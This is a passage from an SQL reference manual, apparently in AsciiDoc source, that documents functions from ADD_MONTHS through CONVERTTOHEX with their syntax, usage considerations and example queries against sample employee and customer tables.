See <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n<<<\r\n[[examples_of_add_months]]\r\n=== Examples of ADD_MONTHS\r\n\r\n* This function returns the value DATE '2007-03-31':\r\n+\r\n```\r\nADD_MONTHS(DATE '2007-02-28', 1, 1)\r\n```\r\n\r\n* This function returns the value DATE '2007-03-28':\r\n+\r\n```\r\nADD_MONTHS(DATE '2007-02-28', 1, 0)\r\n```\r\n\r\n* This function returns the value DATE '2008-03-28':\r\n+\r\n```\r\nADD_MONTHS(DATE '2008-02-28', 1, 1)\r\n```\r\n\r\n* This function returns the timestamp '2009-02-28 00:00:00':\r\n+\r\n```\r\nADD_MONTHS(timestamp '2008-02-29 00:00:00', 12, 1)\r\n```\r\n\r\n<<<\r\n[[ascii_function]]\r\n== ASCII Function\r\n\r\nThe ASCII function returns the integer that is the ASCII code of the\r\nfirst character in a character string expression associated with either\r\nthe ISO88591 character set or the UTF8 character set.\r\n\r\nASCII is a {project-name} SQL extension.\r\n\r\n```\r\nASCII (character-expression)\r\n```\r\n\r\n* `_character-expression_`\r\n+\r\nis an SQL character value expression that specifies a string of\r\ncharacters. See <<character_value_expressions,Character Value Expressions>>.\r\n\r\n[[considerations_for_ascii]]\r\n=== Considerations for ASCII\r\n\r\nFor a string expression in the UTF8 character set, if the value of the\r\nfirst byte in the string is greater than 127, {project-name} SQL returns this\r\nerror message:\r\n\r\n```\r\nERROR[8428] The argument to function ASCII is not valid.\r\n```\r\n\r\n[[examples_of_ascii]]\r\n=== Examples of ASCII\r\n\r\n* Select the column JOBDESC and return the ASCII code of the first\r\ncharacter of the job description:\r\n+\r\n```\r\nSELECT jobdesc, ASCII (jobdesc) FROM persnl.job;\r\n\r\nJOBDESC (EXPR)\r\n----------------- --------\r\nMANAGER 77\r\nPRODUCTION SUPV 80\r\nASSEMBLER 65\r\nSALESREP 83\r\n... ...\r\n\r\n--- 10 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[asin_function]]\r\n== ASIN Function\r\n\r\nThe ASIN function returns the arcsine of a numeric value expression as\r\nan angle expressed in radians.\r\n\r\nASIN is a {project-name} SQL extension.\r\n\r\n```\r\nASIN (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the ASIN function. The range for the value of the argument is\r\nfrom -1 to +1. See <<numeric_value_expressions,Numeric Value Expressions>>.
[[examples_of_asin]]\r\n=== Examples of ASIN\r\n\r\n* This function returns the value 3.49044414403046400e-001 or\r\napproximately 0.3491 in radians (which is 20 degrees):\r\n+\r\n```\r\nASIN(0.3420)\r\n```\r\n\r\n* This function returns the value 0.3491. The function ASIN is the\r\ninverse of the function SIN.\r\n+\r\n```\r\nASIN(SIN(0.3491))\r\n```\r\n\r\n<<<\r\n[[atan_function]]\r\n== ATAN Function\r\n\r\nThe ATAN function returns the arctangent of a numeric value expression\r\nas an angle expressed in radians.\r\n\r\nATAN is a {project-name} SQL extension.\r\n\r\n```\r\nATAN (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the ATAN function. See <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_atan]]\r\n=== Examples of ATAN\r\n\r\n* This function returns the value 8.72766423249958272E-001 or\r\napproximately 0.8727 in radians (which is 50 degrees):\r\n+\r\n```\r\nATAN (1.192)\r\n```\r\n\r\n* This function returns the value 0.8727. The function ATAN is the\r\ninverse of the function TAN.\r\n+\r\n```\r\nATAN (TAN (0.8727))\r\n```\r\n\r\n<<<\r\n[[atan2_function]]\r\n== ATAN2 Function\r\n\r\nThe ATAN2 function returns the arctangent of the x and y coordinates,\r\nspecified by two numeric value expressions, as an angle expressed in\r\nradians.\r\n\r\nATAN2 is a {project-name} SQL extension.\r\n\r\n```\r\nATAN2 (numeric-expression-x, numeric-expression-y)\r\n```\r\n\r\n* `_numeric-expression-x_, _numeric-expression-y_`\r\n+\r\nare SQL numeric value expressions that specify the value for the x and y\r\ncoordinate arguments of the ATAN2 function. See\r\n<<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_atan2]]\r\n=== Examples of ATAN2\r\n\r\n* This function returns the value 2.66344329881899520E+000, or\r\napproximately 2.6634:\r\n+\r\n```\r\nATAN2 (1.192, -2.3)\r\n```\r\n\r\n<<<\r\n[[authname_function]]\r\n== AUTHNAME Function\r\n\r\nThe AUTHNAME function returns the name of the authorization ID that is\r\nassociated with the specified authorization ID number.\r\n\r\n```\r\nAUTHNAME (auth-id)\r\n```\r\n\r\n* `_auth-id_`\r\n+\r\nis the 32-bit number associated with an authorization ID. See\r\n<<authorization_ids,Authorization IDs>>.\r\n\r\nThe AUTHNAME function is similar to the <<user_function,USER Function>>.\r\n\r\n[[considerations_for_authname]]\r\n=== Considerations for AUTHNAME\r\n\r\n* This function can be specified only in the top level of a SELECT statement.\r\n* The value returned is string data type VARCHAR(128) and is in ISO8859-1 encoding.\r\n\r\n[[examples_of_authname]]\r\n=== Examples of AUTHNAME\r\n\r\n* This example shows the authorization name associated with the\r\nauthorization ID number, 33333:\r\n+\r\n```\r\n>>SELECT AUTHNAME (33333) FROM (values(1)) x(a);\r\n\r\n(EXPR)\r\n-------------------------\r\nDB ROOT\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[avg_function]]\r\n== AVG Function\r\n\r\nAVG is an aggregate function that returns the average of a set of\r\nnumbers.\r\n\r\n```\r\nAVG ([ALL | DISTINCT] expression)\r\n```\r\n\r\n* `ALL | DISTINCT`\r\n+\r\nspecifies whether duplicate values are included in the computation of\r\nthe AVG of the _expression_. The default option is ALL, which causes\r\nduplicate values to be included. 
If you specify DISTINCT, duplicate\r\nvalues are eliminated before the AVG function is applied.\r\n\r\n* `_expression_`\r\n+\r\nspecifies a numeric or interval value _expression_ that determines the\r\nvalues to average. The _expression_ cannot contain an aggregate function\r\nor a subquery. The DISTINCT clause specifies that the AVG function\r\noperates on distinct values from the one-column table derived from the\r\nevaluation of _expression_.\r\n\r\nSee <<numeric_value_expressions,Numeric Value Expressions>> and\r\n<<interval_value_expressions,Interval Value Expressions>>.\r\n\r\n[[considerations_for_avg]]\r\n=== Considerations for AVG\r\n\r\n[[data-type-of-the-result]]\r\n==== Data Type of the Result\r\n\r\nThe data type of the result depends on the data type of the argument. If\r\nthe argument is an exact numeric type, the result is LARGEINT. If the\r\nargument is an approximate numeric type, the result\r\nis DOUBLE PRECISION. If the argument is INTERVAL data type, the result\r\nis INTERVAL with the same precision as the argument.\r\n\r\nThe scale of the result is the same as the scale of the argument. If the\r\nargument has no scale, the result is truncated.\r\n\r\n[[operands-of-the-expression]]\r\n==== Operands of the Expression\r\n\r\nThe expression includes columns from the rows of the SELECT result table but\r\ncannot include an aggregate function. These expressions are valid:\r\n\r\n```\r\nAVG (SALARY)\r\nAVG (SALARY * 1.1)\r\nAVG (PARTCOST * QTY_ORDERED)\r\n```\r\n\r\n[[avg_nulls]]\r\n==== Nulls\r\n\r\nAll nulls are eliminated before the function is applied to the set of\r\nvalues. If the result table is empty, AVG returns NULL.\r\n\r\n[[examples_of_avg]]\r\n=== Examples of AVG\r\n\r\n* Return the average value of the SALARY column:\r\n+\r\n```\r\nSELECT AVG (salary) FROM persnl.employee;\r\n\r\n(EXPR)\r\n---------------------\r\n 49441.52\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n* Return the average value of the set of unique SALARY values:\r\n+\r\n```\r\nSELECT AVG(DISTINCT salary) AS Avg_Distinct_Salary FROM persnl.employee;\r\n\r\nAVG_DISTINCT_SALARY\r\n---------------------\r\n 53609.89\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n* Return the average salary by department:\r\n+\r\n```\r\nSELECT deptnum, AVG (salary) AS \"AVERAGE SALARY\"\r\nFROM persnl.employee\r\nWHERE deptnum < 3000 GROUP BY deptnum;\r\n\r\nDept\/Num \"AVERAGE SALARY\"\r\n-------- ---------------------\r\n 1000 52000.17\r\n 2000 50000.10\r\n 1500 41250.00\r\n 2500 37000.00\r\n\r\n--- 4 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[bitand_function]]\r\n== BITAND Function\r\n\r\nThe BITAND function performs an AND operation on corresponding bits of\r\nthe two operands. If both bits are 1, the result bit is 1. Otherwise the\r\nresult bit is 0.\r\n\r\n```\r\nBITAND (expression, expression)\r\n```\r\n\r\n* `_expression_`\r\n+\r\nThe result data type is a binary number. Depending on the precision of\r\nthe operands, the data type of the result can either be an INT (32-bit\r\ninteger) or a LARGEINT (64-bit integer).\r\n+\r\nIf the maximum precision of either operand is greater than 9, LARGEINT is\r\nchosen (numbers with precision greater than 9 are represented by\r\nLARGEINT). Otherwise, INT is chosen.\r\n+\r\nIf both operands are unsigned, the result is unsigned. Otherwise, the\r\nresult is signed. 
Both operands are converted to the result data type\r\nbefore performing the bit operation.\r\n\r\n[[considerations_for_bitand]]\r\n=== Considerations for BITAND\r\n\r\nBITAND can be used anywhere in an SQL query where an expression could be\r\nused. This includes SELECT lists, WHERE predicates, VALUES clauses, SET\r\nstatements, and so on.\r\n\r\nThis function returns a numeric data type and can be used in arithmetic\r\nexpressions.\r\n\r\nNumeric operands can be positive or negative numbers. All numeric data\r\ntypes are allowed with the exceptions listed in the\r\n<<restrictions_for_bitand,Restrictions for BITAND>> section.\r\n\r\n[[restrictions_for_bitand]]\r\n==== Restrictions for BITAND\r\n\r\nThe following are BITAND restrictions:\r\n\r\n* Must have two operands\r\n* Operands must be binary or decimal exact numerics\r\n* Operands must have scale of zero\r\n* Operands cannot be floating point numbers\r\n* Operands cannot be an extended precision numeric (the maximum precision of an extended numeric data type is 128)\r\n\r\n[[examples_of_bitand]]\r\n=== Examples of BITAND\r\n\r\n```\r\n>>select bitand(1,3) from (values(1)) x(a);\r\n\r\n(EXPR)\r\n--------------\r\n 1\r\n\r\n--- 1 row(s) selected.\r\n\r\n>>select 1 & 3 from (values(1)) x(a);\r\n\r\n(EXPR)\r\n--------------\r\n 1\r\n\r\n--- 1 row(s) selected.\r\n\r\n>>select bitand(1,3) + 0 from (values(1)) x(a);\r\n\r\n(EXPR)\r\n--------------\r\n 1\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[case_expression]]\r\n== CASE (Conditional) Expression\r\n\r\nThe CASE expression is a conditional expression with two forms: simple\r\nand searched.\r\n\r\nIn a simple CASE expression, {project-name} SQL compares a value to a\r\nsequence of values and sets the CASE expression to the value associated\r\nwith the first match — if a match exists. If no match exists, {project-name}\r\nSQL returns the value specified in the ELSE clause (which can be null).\r\n\r\nIn a searched CASE expression, {project-name} SQL evaluates a sequence of\r\nconditions and sets the CASE expression to the value associated with the\r\nfirst condition that is true — if a true condition exists. If no true\r\ncondition exists, {project-name} SQL returns the value specified in the ELSE\r\nclause (which can be null).\r\n\r\n*Simple CASE is*:\r\n\r\n```\r\nCASE case-expression\r\n WHEN expression-1 THEN {result-expression-1 | NULL}\r\n WHEN expression-2 THEN {result-expression-2 | NULL}\r\n ...\r\n WHEN expression-n THEN {result-expression-n | NULL}\r\n [ELSE {result-expression | NULL}]\r\nEND\r\n```\r\n\r\n*Searched CASE is*:\r\n\r\n```\r\nCASE\r\n WHEN condition-1 THEN {result-expression-1 | NULL}\r\n WHEN condition-2 THEN {result-expression-2 | NULL}\r\n ...\r\n WHEN condition-n THEN {result-expression-n | NULL}\r\n [ELSE {result-expression | NULL}]\r\nEND\r\n```\r\n\r\n* `_case-expression_`\r\n+\r\nspecifies a value expression that is compared to the value expressions\r\nin each WHEN clause of a simple CASE. The data type of each _expression_\r\nin the WHEN clause must be comparable to the data type of\r\n_case-expression_.\r\n\r\n* `_expression-1_ … _expression-n_`\r\n+\r\nspecifies a value associated with each _result-expression_. If the\r\nvalue of an _expression_ in a WHEN clause matches the value of\r\n_case-expression_, simple CASE returns the associated\r\n_result-expression_ value. 
If no match exists, the CASE expression\r\nreturns the value expression specified in the ELSE clause, or NULL if\r\nthe ELSE value is not specified.\r\n\r\n* `_result-expression-1_ … _result-expression-n_`\r\n+\r\nspecifies the result value expression associated with each _expression_\r\nin a WHEN clause of a simple CASE, or with each _condition_ in a WHEN\r\nclause of a searched CASE. All of the _result-expressions_ must have\r\ncomparable data types, and at least one of the\r\n_result-expressions_ must return non-null.\r\n\r\n* `_result-expression_`\r\n+\r\nfollows the ELSE keyword and specifies the value returned if none of the\r\nexpressions in the WHEN clause of a simple CASE are equal to the case\r\nexpression, or if none of the conditions in the WHEN clause of a\r\nsearched CASE are true. If the ELSE _result-expression_ clause is not\r\nspecified, CASE returns NULL. The data type of _result-expression_ must\r\nbe comparable to the other results.\r\n\r\n* `_condition-1_ … _condition-n_`\r\n+\r\nspecifies conditions to test for in a searched CASE. If a _condition_ is\r\ntrue, the CASE expression returns the associated _result-expression_\r\nvalue. If no _condition_ is true, the CASE expression returns the value\r\nexpression specified in the ELSE clause, or NULL if the ELSE value is\r\nnot specified.\r\n\r\n[[considerations_for_case]]\r\n=== Considerations for CASE\r\n\r\n[[data_type_of_the_case_expression]]\r\n==== Data Type of the CASE Expression\r\n\r\nThe data type of the result of the CASE expression depends on the data\r\ntypes of the result expressions. If the results all have the same data\r\ntype, the CASE expression adopts that data type. If the results have\r\ncomparable but not identical data types, the CASE expression adopts the\r\ndata type of the union of the result expressions. 
This result data type\r\nis determined in these ways.\r\n\r\n[[character_data_type]]\r\n==== Character Data Type\r\n\r\nIf any data type of the result expressions is variable-length character\r\nstring, the result data type is variable-length character string with\r\nmaximum length equal to the maximum length of the result expressions.\r\n\r\nOtherwise, if none of the data types is variable-length character\r\nstring, the result data type is fixed-length character string with length\r\nequal to the maximum of the lengths of the result expressions.\r\n\r\n[[numeric_data_type]]\r\n==== Numeric Data Type\r\n\r\nIf all of the data types of the result expressions are exact numeric,\r\nthe result data type is exact numeric with precision and scale equal to\r\nthe maximum of the precisions and scales of the result expressions.\r\n\r\nFor example, if _result-expression-1_ and _result-expression-2_ have\r\ndata type NUMERIC(5) and _result-expression-3_ has data type\r\nNUMERIC(8,5), the result data type is NUMERIC(10,5).\r\n\r\nIf any data type of the result expressions is approximate numeric, the\r\nresult data type is approximate numeric with precision equal to the\r\nmaximum of the precisions of the result expressions.\r\n\r\n[[datetime_data_type]]\r\n==== Datetime Data Type\r\n\r\nIf the data type of the result expressions is datetime, the result data\r\ntype is the same datetime data type.\r\n\r\n[[interval_data_type]]\r\n==== Interval Data Type\r\n\r\nIf the data type of the result expressions is interval, the result data\r\ntype is the same interval data type (either year-month or day-time) with\r\nthe start field being the most significant of the start fields of the\r\nresult expressions and the end field being the least significant of the\r\nend fields of the result expressions.\r\n\r\n[[examples_of_case]]\r\n=== Examples of CASE\r\n\r\n* Use a simple CASE to decode JOBCODE and return NULL if JOBCODE does\r\nnot match any of the listed values:\r\n+\r\n```\r\nSELECT\r\n last_name\r\n, first_name\r\n, CASE jobcode\r\n WHEN 100 THEN 'MANAGER'\r\n WHEN 200 THEN 'PRODUCTION SUPV'\r\n WHEN 250 THEN 'ASSEMBLER'\r\n WHEN 300 THEN 'SALESREP'\r\n WHEN 400 THEN 'SYSTEM ANALYST'\r\n WHEN 420 THEN 'ENGINEER'\r\n WHEN 450 THEN 'PROGRAMMER'\r\n WHEN 500 THEN 'ACCOUNTANT'\r\n WHEN 600 THEN 'ADMINISTRATOR ANALYST'\r\n WHEN 900 THEN 'SECRETARY'\r\n ELSE NULL\r\n END\r\nFROM persnl.employee;\r\n\r\nLAST_NAME FIRST_NAME (EXPR)\r\n-------------------- --------------- -----------------\r\nGREEN ROGER MANAGER\r\nHOWARD JERRY MANAGER\r\nRAYMOND JANE MANAGER\r\n...\r\nCHOU JOHN SECRETARY\r\nCONRAD MANFRED PROGRAMMER\r\nHERMAN JIM SALESREP\r\nCLARK LARRY ACCOUNTANT\r\nHALL KATHRYN SYSTEM ANALYST\r\n...\r\n\r\n--- 62 row(s) selected.\r\n```\r\n\r\n* Use a searched CASE to return LAST_NAME, FIRST_NAME and a value based\r\non SALARY that depends on the value of DEPTNUM:\r\n+\r\n```\r\nSELECT\r\n last_name\r\n, first_name\r\n, deptnum\r\n, CASE\r\n WHEN deptnum = 9000 THEN salary * 1.10\r\n WHEN deptnum = 1000 THEN salary * 1.12 ELSE salary\r\n END\r\nFROM persnl.employee;\r\n\r\nLAST_NAME FIRST_NAME DEPTNUM (EXPR)\r\n---------------- ------------ ------- -------------------\r\nGREEN ROGER 9000 193050.0000\r\nHOWARD JERRY 1000 153440.1120\r\nRAYMOND JANE 3000 136000.0000\r\n...\r\n\r\n--- 62 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[cast_expression]]\r\n== CAST Expression\r\n\r\nThe CAST expression converts data to the data type you specify.\r\n\r\n```\r\nCAST ({expression | NULL} AS data-type) \r\n```\r\n\r\n* 
`_expression_ | NULL`\r\n+\r\nspecifies the operand to convert to the data type _data-type_.\r\n+\r\nIf the operand is an _expression_, then _data-type_ depends on the\r\ndata type of _expression_ and follows the rules outlined in\r\n<<valid_conversions_for_cast,Valid Conversions for CAST>>.\r\n+\r\nIf the operand is NULL, or if the value of the _expression_ is null, the\r\nresult of CAST is NULL, regardless of the data type you specify.\r\n\r\n* `_data-type_`\r\n+\r\nspecifies a data type to associate with the operand of CAST. See\r\n<<data_types,Data Types>>.\r\n+\r\nWhen casting data to a CHAR or VARCHAR data type, the resulting data\r\nvalue is left justified. Otherwise, the resulting data value is right\r\njustified. Further, when you are casting to a CHAR or VARCHAR data type,\r\nyou must specify the length of the target value.\r\n\r\n[[considerations_for_cast]]\r\n=== Considerations for CAST\r\n\r\n* Fractional portions are discarded when you use CAST of a numeric value to an INTERVAL type.\r\n* Depending on how your file is set up, using CAST might cause poor\r\nquery performance by preventing the optimizer from choosing the most\r\nefficient plan and requiring the executor to perform a complete table or\r\nindex scan.\r\n\r\n[[valid_conversions_for_cast]]\r\n==== Valid Conversions for CAST\r\n\r\n* An exact or approximate numeric value to any other numeric data type.\r\n* An exact or approximate numeric value to any character string data type.\r\n* An exact numeric value to either a single-field year-month or day-time interval such as INTERVAL DAY(2).\r\n* A character string to any other data type, with one restriction:\r\n+\r\nThe contents of the character string to be converted must be consistent\r\nin meaning with the data type of the result. For example, if you are\r\nconverting to DATE, the contents of the character string must be 10\r\ncharacters consisting of the year, a hyphen, the month, another hyphen,\r\nand the day.\r\n* A date value to a character string or to a TIMESTAMP ({project-name} SQL fills in the time part with 00:00:00.00).\r\n* A time value to a character string or to a TIMESTAMP ({project-name} SQL fills in the date part with the current date).\r\n* A timestamp value to a character string, a DATE, a TIME, or another TIMESTAMP with different fractional seconds precision.\r\n* A year-month interval value to a character string, an exact numeric,\r\nor to another year-month INTERVAL with a different start field precision.\r\n* A day-time interval value to a character string, an exact numeric, or\r\nto another day-time INTERVAL with a different start field precision.\r\n\r\n[[examples_of_cast]]\r\n=== Examples of CAST\r\n\r\n* In this example, the fractional portion is discarded:\r\n+\r\n```\r\nCAST (123.956 as INTERVAL DAY(18))\r\n```\r\n\r\n* This example returns the difference of two timestamps in minutes:\r\n+\r\n```\r\nCAST((d.step_end - d.step_start) AS INTERVAL MINUTE)\r\n```\r\n\r\n* Suppose that your database includes a log file of user information.\r\nThis example converts the current timestamp to a character string and\r\nconcatenates the result to a character literal. 
Note the length must be\r\nspecified.\r\n+\r\n```\r\nINSERT INTO stats.logfile (user_key, user_info)\r\nVALUES (001, 'User JBrook, executed at ' || CAST (CURRENT_TIMESTAMP AS CHAR(26)));\r\n```\r\n\r\n<<<\r\n[[ceiling_function]]\r\n== CEILING Function\r\n\r\nThe CEILING function returns the smallest integer, represented as a\r\nFLOAT data type, greater than or equal to a numeric value expression.\r\n\r\nCEILING is a {project-name} SQL extension.\r\n\r\n```\r\nCEILING (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the CEILING function.\r\nSee <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_ceiling]]\r\n=== Examples of CEILING\r\n\r\n* This function returns the integer value 3.00000000000000000E+000,\r\nrepresented as a FLOAT data type:\r\n+\r\n```\r\nCEILING (2.25)\r\n```\r\n\r\n<<<\r\n[[char_function]]\r\n== CHAR Function\r\n\r\nThe CHAR function returns the character that has the specified code\r\nvalue, which must be of exact numeric with scale 0.\r\n\r\nCHAR is a {project-name} SQL extension.\r\n\r\n```\r\nCHAR (code-value [, char-set-name])\r\n```\r\n\r\n* `_code-value_`\r\n+\r\nis a valid code value in the character set in use.\r\n\r\n* `_char-set-name_`\r\n+\r\ncan be ISO88591 or UTF8. The returned character will be associated with\r\nthe character set specified by _char-set-name_.\r\n+\r\nThe default for _char-set-name_ is ISO88591.\r\n\r\n[[considerations_for_char]]\r\n=== Considerations for CHAR\r\n\r\n* For the ISO88591 character set, the return type is VARCHAR(1).\r\n* For the UTF8 character set, the return type is VARCHAR(1).\r\n\r\n[[examples_of_char]]\r\n=== Examples of CHAR\r\n\r\n* Select the column CUSTNAME and return the ASCII code of the first\r\ncharacter of the customer name and its CHAR value:\r\n+\r\n```\r\nSELECT custname, ASCII (custname), CHAR (ASCII (custname))\r\nFROM sales.customer;\r\n\r\nCUSTNAME (EXPR) (EXPR)\r\n------------------ ------- -------\r\nCENTRAL UNIVERSITY 67 C\r\nBROWN MEDICAL CO 66 B\r\nSTEVENS SUPPLY 83 S\r\nPREMIER INSURANCE 80 P\r\n... ... ...\r\n\r\n--- 15 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[char_length_function]]\r\n== CHAR_LENGTH Function\r\n\r\nThe CHAR_LENGTH function returns the number of characters in a string.\r\nYou can also use CHARACTER_LENGTH. Every character, including multi-byte\r\ncharacters, counts as one character.\r\n\r\n```\r\nCHAR[ACTER]_LENGTH (string-value-expression)\r\n```\r\n\r\n* `_string-value-expression_`\r\n+\r\nspecifies the string value expression for which to return the length in\r\ncharacters. {project-name} SQL returns the result as a two-byte signed\r\ninteger with a scale of zero. If _string-value-expression_ is null,\r\n{project-name} SQL returns null.\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n[[considerations_for_char_length]]\r\n=== Considerations for CHAR_LENGTH\r\n\r\n[[char_and_varchar_operands]]\r\n==== CHAR and VARCHAR Operands\r\n\r\nFor a column declared as fixed CHAR, {project-name} SQL returns the maximum\r\nlength of that column. For a VARCHAR column, {project-name} SQL returns the\r\nactual length of the string stored in that column.\r\n\r\n[[examples_of_char_length]]\r\n=== Examples of CHAR_LENGTH\r\n\r\n* This function returns 12 as the result. 
The concatenation operator is\r\ndenoted by two vertical bars (\\|\\|).\r\n+\r\n```\r\nCHAR_LENGTH ('ROBERT' || ' ' || 'SMITH')\r\n```\r\n\r\n* The string '' is the null (or empty) string. This function returns 0\r\n(zero):\r\n+\r\n```\r\nCHAR_LENGTH ('')\r\n```\r\n\r\n* The DEPTNAME column has data type CHAR(12). Therefore, this function\r\nalways returns 12:\r\n+\r\n```\r\nCHAR_LENGTH (deptname)\r\n```\r\n\r\n* The PROJDESC column in the PROJECT table has data type VARCHAR(18).\r\nThis function returns the actual length of the column value — not 18 for\r\nshorter strings — because it is a VARCHAR value:\r\n+\r\n```\r\nSELECT CHAR_LENGTH (projdesc) FROM persnl.project;\r\n\r\n(EXPR)\r\n----------\r\n 14\r\n 13\r\n 13\r\n 17\r\n 9\r\n 9\r\n\r\n--- 6 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[coalesce_function]]\r\n== COALESCE Function\r\n\r\nThe COALESCE function returns the value of the first expression in the\r\nlist that does not have a NULL value; if all the expressions have NULL\r\nvalues, the function returns a NULL value.\r\n\r\n```\r\nCOALESCE (expr1, expr2, ...)\r\n```\r\n\r\n* `_expr1_`\r\n+\r\nan expression to be compared.\r\n\r\n* `_expr2_`\r\n+\r\nan expression to be compared.\r\n\r\n[[examples_of_coalesce]]\r\n=== Examples of COALESCE\r\n\r\n* COALESCE returns the value of the first operand that is not NULL:\r\n+\r\n```\r\nSELECT COALESCE (office_phone, cell_phone, home_phone, pager, fax_num, '411')\r\nfrom emptbl;\r\n```\r\n\r\n<<<\r\n[[code_value_function]]\r\n== CODE_VALUE Function\r\n\r\nThe CODE_VALUE function returns an unsigned integer (INTEGER UNSIGNED)\r\nthat is the code point of the first character in a character value\r\nexpression that can be associated with one of the supported character\r\nsets.\r\n\r\nCODE_VALUE is a {project-name} SQL extension.\r\n\r\n```\r\nCODE_VALUE (character-value-expression)\r\n```\r\n\r\n* `_character-value-expression_`\r\n+\r\nis a character string.\r\n\r\n[[examples_of_code_value_function]]\r\n=== Examples of CODE_VALUE Function\r\n\r\n* This function returns 97 as the result:\r\n+\r\n```\r\n>>select code_value('abc') from (values(1))x;\r\n\r\n(EXPR)\r\n----------\r\n 97\r\n```\r\n\r\n<<<\r\n[[concat_function]]\r\n== CONCAT Function\r\n\r\nThe CONCAT function returns the concatenation of two character value\r\nexpressions as a character string value. You can also use the\r\nconcatenation operator (\\|\\|).\r\n\r\nCONCAT is a {project-name} SQL extension.\r\n\r\n```\r\nCONCAT (character-expr-1, character-expr-2)\r\n```\r\n\r\n* `_character-expr-1_, _character-expr-2_`\r\n+\r\nare SQL character value expressions (of data type CHAR or VARCHAR) that\r\nspecify two strings of characters. Both character value expressions must\r\nbe either ISO88591 character expressions or UTF8 character expressions.\r\nThe result of the CONCAT function is the concatenation of\r\n_character-expr-1_ with _character-expr-2_. The result type is CHAR if\r\nboth expressions are of type CHAR and it is VARCHAR if either of the\r\nexpressions is of type VARCHAR.\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n[[concatenation_operator]]\r\n=== Concatenation Operator (||)\r\n\r\nThe concatenation operator, denoted by two vertical bars (||),\r\nconcatenates two string values to form a new string value. 
To indicate\r\nthat two strings are concatenated, connect the strings with two vertical\r\nbars (\\|\\|):\r\n\r\n```\r\ncharacter-expr-1 || character-expr-2\r\n```\r\n\r\nAn operand can be any SQL value expression of data type CHAR or VARCHAR.\r\n\r\n[[considerations_for_concat]]\r\n=== Considerations for CONCAT\r\n\r\n[[operands]]\r\n==== Operands\r\n\r\nA string value can be specified by any character value expression, such\r\nas a character string literal, character string function, column\r\nreference, aggregate function, scalar subquery, CASE expression, or CAST\r\nexpression. The value of the operand must be of type CHAR or VARCHAR.\r\n\r\nIf you use the CAST expression, you must specify the length of CHAR or\r\nVARCHAR.\r\n\r\n[[sql-parameters]]\r\n==== SQL Parameters\r\n\r\nYou can concatenate an SQL parameter and a character value expression.\r\nThe concatenated parameter takes on the data type attributes of the\r\ncharacter value expression. Consider this example, where ?p is assigned\r\na string value of '5 March':\r\n\r\n```\r\n?p || ' 2002'\r\n```\r\n\r\nThe type assignment of the parameter ?p becomes CHAR(5), the same data\r\ntype as the character literal ' 2002'. Because you assigned a string\r\nvalue of more than five characters to ?p, {project-name} SQL returns a\r\ntruncation warning, and the result of the concatenation is 5 Mar 2002.\r\n\r\nTo specify the type assignment of the parameter, use the CAST expression\r\non the parameter as:\r\n\r\n```\r\nCAST(?p AS CHAR(7)) || ' 2002'\r\n```\r\n\r\nIn this example, the parameter is not truncated, and the result of the\r\nconcatenation is 5 March 2002.\r\n\r\n[[examples_of_concat]]\r\n=== Examples of CONCAT\r\n\r\n* Insert information consisting of a single character string. Use the\r\nCONCAT function to construct and insert the value:\r\n+\r\n```\r\nINSERT INTO stats.logfile (user_key, user_info)\r\nVALUES (001, CONCAT ('Executed at ', CAST (CURRENT_TIMESTAMP AS CHAR(26))));\r\n```\r\n\r\n* Use the concatenation operator || to construct and insert the value:\r\n+\r\n```\r\nINSERT INTO stats.logfile (user_key, user_info)\r\nVALUES (002, 'Executed at ' || CAST (CURRENT_TIMESTAMP AS CHAR(26)));\r\n```\r\n\r\n<<<\r\n[[converttohex_function]]\r\n== CONVERTTOHEX Function\r\n\r\nThe CONVERTTOHEX function converts the specified value expression to\r\nhexadecimal for display purposes.\r\n\r\nCONVERTTOHEX is a {project-name} SQL extension.\r\n\r\n```\r\nCONVERTTOHEX (expression)\r\n```\r\n\r\n* `_expression_`\r\n+\r\nis any numeric, character, datetime, or interval expression.\r\n\r\nThe primary purpose of the CONVERTTOHEX function is to eliminate any\r\ndoubt as to the exact value in a column. 
It is particularly useful for\r\ncharacter expressions where some characters may be from character sets\r\nthat are not supported by the client terminal's locale or may be control\r\ncodes or other non-displayable characters.\r\n\r\n[[considerations_for_converttohex]]\r\n=== Considerations for CONVERTTOHEX\r\n\r\nAlthough CONVERTTOHEX is usable on datetime and interval expressions,\r\nthe displayed output shows the internal value and is, consequently, not\r\nparticularly meaningful to general users and is subject to change in\r\nfuture releases.\r\n\r\nCONVERTTOHEX returns ASCII characters in ISO8859-1 encoding.\r\n\r\n<<<\r\n[[examples_of_converttohex]]\r\n=== Examples of CONVERTTOHEX\r\n\r\n* Display the contents of a smallint, integer, and largeint in\r\nhexadecimal:\r\n+\r\n```\r\nCREATE TABLE EG (S1 smallint, I1 int, L1 largeint);\r\n\r\nINSERT INTO EG VALUES( 37, 2147483647, 2305843009213693951);\r\n\r\nSELECT CONVERTTOHEX(S1), CONVERTTOHEX(I1), CONVERTTOHEX(L1) from EG;\r\n\r\n(EXPR) (EXPR) (EXPR)\r\n------ -------- ----------------\r\n0025 7FFFFFFF 1FFFFFFFFFFFFFFF\r\n```\r\n\r\n* Display the contents of a CHAR(4) column, a VARCHAR(4) column, and a\r\nCHAR(4) column that uses the UTF8 character set. The varchar column does\r\nnot have a trailing space character as the fixed-length columns have:\r\n+\r\n```\r\nCREATE TABLE EG_CH (FC4 CHAR(4), VC4 